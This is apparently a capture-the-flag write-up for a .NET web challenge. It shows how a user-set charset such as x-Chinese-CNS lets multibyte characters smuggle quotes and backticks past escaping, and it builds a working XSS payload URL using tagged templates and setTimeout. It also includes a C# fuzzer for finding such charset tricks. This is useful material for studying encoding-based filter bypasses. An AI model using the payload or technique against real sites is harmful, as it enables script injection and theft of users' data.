The challenge is written in C#. In the beginning of Program.cs we can find the following line:
Encoding.RegisterProvider(CodePagesEncodingProvider.Instance);This statement enables a broader range of character encodings within the application. By default, modern .NET platforms support only a limited set of Unicode encodings (like UTF-8 or UTF-16) and ASCII. However, with this registration, the available encodings expand significantly, including even those that are not ASCII-compatible.
Another feature of the challenge that should immediately catch attention is the /file endpoint. By default it's used to load JavaScript, for example with the following URL:
/file?filename=script.js&q=abc&ct=text/javascript
The q parameter is reflected in the content inside a snippet of JavaScript, for example:
// Load the query from request.
// TODO: Maybe we should move this directly to HTML into a <script> tag?
window.q = 'abc';
// XSS prevention
const PAYLOADS = [`<script>`, `</script>`, `javascript:`, `onerror=`];
for (const payload of PAYLOADS) {
if (window.q.toLowerCase().includes(payload)) {
throw new Error('XSS!');
}Most characters are escaped, as determined by the IsSafeChar method, which dictates whether a given character requires escaping.
private static bool IsSafeChar(char c)
{
var cat = char.GetUnicodeCategory(c);
// We don't consider ModifierLetter safe.
var isLetter = cat == UnicodeCategory.LowercaseLetter ||
cat == UnicodeCategory.UppercaseLetter ||
cat == UnicodeCategory.OtherLetter;
return isLetter || char.IsWhiteSpace(c);
}With the ct parameter users can specify the Content-Type of the response. The Content-Type must be syntactically valid and must start with text/.
The goal of the challenge is to find an XSS and use it to steal the flag from localStorage.
WARNING: Spoilers ahead
The fact that the challenge loads additional charsets is an immediate hint that the challenge will have something to do with them.
The endpoint /file?filename=script.js, which is originally loaded with ct=text/javascript can also be loaded as text/html. Because the content contains a <script> tag as well as an end tag </script>, it's still possible to inject JavaScript even when content is set to text/html.
In the /file endpoint, the content from the q parameter is reflected in the following context:
window.q = 'value_of_q_reflected_here';In order to break out of the context, it is necessary to either use ' (to escape from a string) or < (to escape from a string tag). However these characters are escaped to \u0027 and \u003c respectively because of IsSafeChar. Therefore some charset tricks must be employed to use these characters without escaping.
It's possible to pass the charset in the ct parameter, such as ct=text/html;charset=utf-8. The interesting part about .NET is that it's parsing the charset attribute and will emit a response in the specified charset.
So for example if you use the letter "ł" (U+0142 Latin Small Letter L with Stroke) and set charset to utf-8 it will emit bytes c5 82 but if you set charset to utf-16, it will emit bytes 01 42.
Note that not all characters can be represented in all encodings. If you use "ł" and set the charset to shift_jis, .NET will emit an ASCII question mark (this will become important later).
Once Encoding.RegisterProvider(CodePagesEncodingProvider.Instance); is called, the application supports numerous charsets. A crucial aspect here is that if a charset unsupported by browsers is specified, .NET will still encode characters using that encoding, while Chromium will default to windows-1252, a single-byte encoding.
This implies that an unsupported charset might include characters such as ' or < within its multibyte sequences, which are then interpreted as their standard single-byte equivalents by browsers.
To find a useful encoding, we may write a simple fuzzer that will iterate over all encodings and over all characters from 0x0080 to 0xFFFF and check whether there's a ' in the multibyte sequence.
Here's a code in C# that will help us with that:
using System;
using System.Text;
using System.Linq;
public class Program
{
public static void Main()
{
// Make sure all encodings are loaded.
Encoding.RegisterProvider(CodePagesEncodingProvider.Instance);
foreach (EncodingInfo ei in Encoding.GetEncodings().OrderBy(e => e.Name))
{
var e = ei.GetEncoding();
var name = ei.Name;
for (int i = 0x80; i < 0xFFFF; ++i)
{
if (char.IsSurrogate((char)i))
continue;
var c = char.ConvertFromUtf32(i);
var bytes = e.GetBytes(c);
if (bytes.Length < 2)
continue;
if (bytes.Contains((byte)0x27))
{
var url = Uri.EscapeDataString(c);
Console.WriteLine($"{name}: U+{i:X4} ({url}) bytes: {BitConverter.ToString(bytes)}");
}
}
}
}
}Note: You can test this code on dotnetfiddle.
This code will output several interesting encodings but the one we'll focus on is X-Chinese-CNS, which outputs a lot of characters:
x-Chinese-CNS: U+4E0C (%E4%B8%8C) bytes: A1-27
x-Chinese-CNS: U+4F58 (%E4%BD%98) bytes: A3-27
x-Chinese-CNS: U+4FDC (%E4%BF%9C) bytes: A9-27
x-Chinese-CNS: U+51C8 (%E5%87%88) bytes: AE-27
x-Chinese-CNS: U+51D8 (%E5%87%98) bytes: C9-27
x-Chinese-CNS: U+554E (%E5%95%8E) bytes: B4-27
x-Chinese-CNS: U+55C2 (%E5%97%82) bytes: C2-27
x-Chinese-CNS: U+56DF (%E5%9B%9F) bytes: A2-27
[...]
At this point we can do a quick sanity check on one of these characters to ensure that using it will yield an unescaped ' in the output.
Therefore let’s try the following URL:
/file?filename=script.js&q=abc%E4%B8%8C&ct=text/javascript;charset=x-chinese-cns
which will output the following snippet:
// TODO: Maybe we should move this directly to HTML into a <script> tag?
window.q = 'abc¡'';
// XSS prevention
const PAYLOADS = [`<script>`, `</script>`, `javascript:`, `onerror=`];This proves that we can escape from the single-quoted string.
It’s not straightforward though to call arbitrary JS just yet. We cannot just inject ; alert(1)// because all special characters would be escaped. So the only way for us to include any unescaped special characters is to use multibyte representations of characters from the x-Chinese-CNS encoding. This has the side effect that all special characters will be prepended by some other characters (as you can see with ¡' in the example above). In each case, the code of these characters will be greater than 0xA0.
This makes it impossible to call functions using parentheses (as the closing parenthesis would have to be immediately prepended by some other character). However we can still use tagged templates. One eval-like function which works perfectly with tagged templates is setTimeout. You can verify that by calling:
setTimeout`alert(1)`We cannot directly use setTimeout` though because, as already mentioned, all characters that precede the special characters (such as `) are always above 0xA0. Luckily, some of these characters are valid JS identifiers.
For example, in x-Chinese-CNS the character U+5ADD is encoded to 0xC9 0x60. In windows-1250 0xC9 is É which is valid in JS identifiers, while 0x60 is `. So what we can do is to assign setTimeout to a variable called É and then call it using tagged templates. The following code illustrates the idea:
É=setTimeout;
É`alert(1)//É`;Another problematic character is ; which we cannot use for the similar reasons as ). In this case automatic semicolon insertion comes to the rescue. We need to ensure that we’re using new lines at the end of our statements and JS will take care of the rest.
The last missing piece is making sure our code is syntactically valid. First, notice that our JS code starts with the following:
<script> tag?
window.q = 'query_here';The identifier tag is part of the JS code and it would cause a ReferenceError doing execution due to an undefined identifier. We can use hoisting to get around that and just define var tag later in the code.
Then we have the question mark which is the beginning of the ternary operator. It is always of the form: condition ? trueExpresion : falseExpression. Therefore, we need to make sure that our payload includes the : character. As usual this character will be prepended with another one. So consider the following example:
tag ? window.q = 'abcÉ' É: something_else This is a syntax error because the É identifier directly follows a string. We need to insert something between the end of the string and the identifier. One solution is to use the in operator. Then something_else needs to be changed to a valid identifier, so that we don’t get a ReferenceError. In the end, we’ll get:
tag ? window.q = ‘abcÉ’ in É : alertAt this point our injection looks as follows:
// TODO: Maybe we should move this directly to HTML into a <script> tag?
window.q = 'abcÉ' in É: alert
var É=setTimeout
É`{some code here}É`
var tag
';
// XSS prevention
const PAYLOADS = [`<script>`, `</script>`, `javascript:`, `onerror=`];The ultimate missing part is to ensure that we won’t get a syntax error after var tag. This is actually easy and the only thing we need to do is to insert yet another tagged template, so: `É``. This will work because the final snippet of the code will be equivalent to:
É`[...]` < script >`,`Which is just a tagged template with some comparisons.
Let’s now consider the place that was marked with {some code here} in the snippet above. This will be the actual code that we’ll want to execute. In this place we don’t need to worry about escaped characters -- because we’re in a template literal, the JS runtime will unescape these characters anyway.
The final injection is:
xÉ'in É:alert
var É=setTimeout
É`alert(1)//É`
var tag
É`
Now we just need to find valid codepoints in the charset X-Chinese-CNS for each sequence of É and the subsequent character. Again we can write a script in C# that will yield the following codes:
U+51D8 (%E5%87%98): '
U+5604 (%E5%98%84): :
U+5889 (%E5%A2%89): =
U+5ADD (%E5%AB%9D): `
So in the end we have the following payload:
/file?filename=script.js&ct=text/html;charset=x-Chinese-CNS&q=x%E5%87%98in+%E5%98%84alert%0avar+%E5%A2%89setTimeout%0a%E5%AB%9Dalert(1)//%E5%AB%9D%0avar+tag%0a%E5%AB%9D